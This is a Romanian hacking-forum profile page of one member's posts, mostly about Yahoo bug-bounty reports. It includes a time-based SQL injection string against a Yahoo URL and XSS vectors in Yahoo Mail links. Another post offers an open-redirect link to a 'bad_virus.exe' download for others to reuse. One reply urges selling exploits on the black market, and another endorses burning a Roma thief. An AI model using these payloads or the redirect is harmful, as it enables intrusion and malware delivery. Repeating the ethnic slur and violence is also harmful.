-
Posts
531 -
Joined
-
Last visited
-
Days Won
14
Posts posted by SilenTx0
-
-
Da, sunt foarte mul?umit.
Sollaris vorbea despre vulnerabilitatea g?sit? de mine, iar tu ai spus "Si ce pula mea faci acum cu vulnerabilitatea asta?".
Nu mai vorbi aiurea dac? nu cuno?ti.
-
Si ce pula mea faci acum cu vulnerabilitatea asta?
Ca sa umpli rahatul ala de subdomeniu cu XSS nu mai e rentabil. Din cate stiu eu, nu se mai pot fura cookieuri
Ce treaba are SQL Injection cu XSS? Dac? habar n-ave?i ce e cu voi, nu v? mai b?ga-?i s? comenta?i aiurea.
-
Fara nici un fel de suparare sau dorinta de a creea aici un confict,dar.....
din cauza oamenilor ca tine...care doresc sa fie ""the good guy"" cuvantul hacker/cracker/exploiter..isi vor pierde din valoare pana cand la un moment dat o sa dispara.
Un prieten a raportat un exploit la yahoo si a primit ca rasplata:
-un tricou cu yahoo
-o scrisoare de multumire si bla bla bla.
asa ca te poti considera norocos.
Daca esti bagat in chestia asta pentru bani(ca daca nu ai fi pt asta nu ai da raport),cand gasesti un exploit vinde=l pe piata neagra sau la cunostinte din domeniu si poti face 10x ori banii aia.
Traim intr-o lume condusa de oameni rai..iar oamenii bunii ii sterg la fund pe cei rai.
Fiecare isi alege calea cum doreste.
Un mare "BRAVO" pentru marele tau succes,
Prietenul t?u a raportat vulnerabilitatea acum un an sau mai bine, când Yahoo nu avea un program de bug bounty. A?a cum am mai ?i într-un alt topic(tot legat de o vulnerabilitate în Yahoo), nu m? intereseaz? banii f?cu?i în mod ilegal. Tr?im într-o lume condus? de oameni "r?i" din cauza celor care gândesc ca tine. Nu ave?i de cât s? g?si?i vulnerabilit??i ?i s? le vinde?i unde vre?i voi.
-
Frumos omule, felicitari! Din curiozitate, cat timp le-a luat sa iti raspunda si sa iti trimita banii?
A durat destul de mult... Am v?zut c? nu-mi mai r?spund ?i le-am dat mail( vulnerabilitatea era "triaged" de vreo 3 luni). Mi-au spus c? au f?cut o greseala la schimbarea statusului vulnerabilita?ii (au uitat s? o marcheze ca "resolved"). Dup? ce mi-au r?spuns la mail, imediat au modificat statusul ?i ieri mi-au trimis banii.
În total a durat cam 4-5 luni )
-
Este vorba despre o vulnerabilitate SQL Injection care se putea exploata doar prin metoda Time Based.
Exploatându-se doar prin Time Based, nu prea am ce PoC s? pun pentru c? n-am f?cut video.
Aici a fost: https://au.totaltravel.yahoo.com/travel-ideas/galleries/g/-/24496066/1/natures-pools-in-paradise/?cmp=thomepage' if(LEN(DB_NAME())=5) WAITFOR DELAY '0:0:10'--
Am primit o recompens? destul de frumoasa:
- 2
-
VIP pentru niste site-uri de tot rasul?
Hmm,ajuta comunitatea cu ceva daca doresti VIP
Bre @qwerty12, tu chiar nu intelegi cat de periculos e un XSS in site-ul comunei Faurei...Sincer, baiatul chiar merita VIP
-
Am lucrat ?i eu cu el ?i sunt foarte multumit. Recomand:)
-
?i eu sunt interesat
-
Au mai venit ?i al?ii tot cu acelasi tupeu ?i au plecat dezam?gi?i.
-
O sa dau un exemplu dar nu ma ocup cu asa ceva
Hahahahahaha cum a sunat asta:))))) Da bre te prinde, las? cardurile. ?ansa s? te prind? e minim 100%.
-
Acum ceva vreme, printr-un topic spuneai c? ai un an de PHP...În orice caz, dac? tu ai 4 ani de PHP ?i cuno?tin?ele pe care ?tim cu to?ii c? le ai, ai pierdut 4 ani degeaba. Mai bine jucai Mario tot acest timp.
-
?i zici c? nu sunt copiate? Doar un exemplu: PSG-Center | [Leason 1]SQL Injection – Union based -> SQL Injection – Learn to Attack ~ Pro Hack
-
Man , stiu si eu cate putin acolo dupa ce am citit mai peste tot . Si inainte sa creez un tutorial stai tu calm ca ma informez , nu scriu prostii .
Adic? înainte s? îl copii de undeva . Nu cred c? este vreun articol care s? î?i apar?in?.
Dac? vrei s? ai succes, creaz? tu articole, nu le copia.
-
Cine are timp sa se ocupe de ia... eu am netu slab merge greu nu am desfacuto.
WTF?!
Ce cauta prostia asta la ShowOff? https://rstforums.com/forum/49136-citeste-inainte-de-posta.rst
-
o sa revin cu detalii. intre timp nu pot sa inteleg mentalitatea romanilor mancatori de cacat, hateri, etc...adica astia voi care puneti raul inainte. NU AM NIMIC DE PIERDUT BA. oamenii cica urmeaza sa imi trimita niste acte pt vize, si bilete, etc. plus ca nu voi pleca fara contact vizual ...va tin la curent. plus ca am un sentiment bun in leg cu chestia asta..si am avut ghinion toata viata. ce pula mea!
Atunci de ce ai mai cerut parerea noastra? Doar ca sa faci un post( sau 50 din cate vad) in plus?
-
Cred ca iei 50 pe vulnerabilitate...asta daca raspund. Eu am cateva vulnerabilitati triaged de doua luni, probabil mai dureaza vreo 6 pana la payment...
-
Ar fi chemat politia daca era altceva decat tigan. Nu-i vorba de rasism. Sa se comporte ca niste oameni normali nu sa vina sa faca pula mare peste tot si ai sa vezi ca nu are nimeni nimic cu ei. Astia nu-s de iertat...cum l-ai prins l-ai si ars.
-
Won't fix
https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe
Pentru a il folosi doar modificati url de la final
Ps: merge de 3 luni incoace
Nu mai dau bani pe Open Redirect de la inceputul anului
-
Dar cum au rezolvat atunci si acum ai gasit iar?
Stii si tu cum sunt astia de la yahoo...
Ei au redenumit aplicatia care facea cautarea din searchnew in search in loc sa foloseasca o functie care sa filtreze datele (Yahoo style).
Adevarat ca daca dadeam click pe link-ul care l-am trimis in primul raport, xss-ul nu mergea dar daca bagam vectorul direct in search, functiona perfect.
La fel am patit si cu un bug in maps.yahoo.com. Initial am primit duplicate, l-am raportat din nou si am primit valid:)).
Link-ul dat la primul raport(duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail
Link-ul dat la al doilea raport(valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail
-
Initial am primit duplicate pe aceasta vulnerabilitate, am vazut ca dupa vreo doua saptamani inca nu era fixata asa ca am raportat-o din nou. Surpriza, VALID
Recompensa lasa de dorit...
-
Uita-te prin posturile mele , nu sunt mai expert dar nici prost !
Eu n-as zice...ai o parere prea buna despre tine . Un moderator sa inchida topicul.
-
Nu e chiar o pseudo-vulnerabilitate daca stii sa o folosesti (depinde si unde e, daca e in adidas.com poti sa-ti bagi pula in ea).
-
))))))) Deci iti dau un rahat de 3,5 euro si aia virtuali (pe site-ul lor). Adica adauga 3.5 intr-o coloana a bazei de date.
Nu-i vorba de reward, iti dai seama ca nu te poti astepta la cine stie ce recompensa de la un site de genul.
Gestul conteaza...macar arata ca le pasa cat de cat.
-
//Stiind ca a face bypass la htmlentities este un lucru imposibil ,uitati ca aici nu este imposibil ^_^//
Bypass la htmlentities se poate face in unele cazuri ideale.Iin cazul tau vectorul executat nu este cel afisat prin htmlentities, n-ai facut nici un bypass stai linistit.
Microsoft Online Services Bug Bounty
in Stiri securitate
Posted
Era ?i timpul s? bage bug bounty...mai bine mai târziu decât deloc.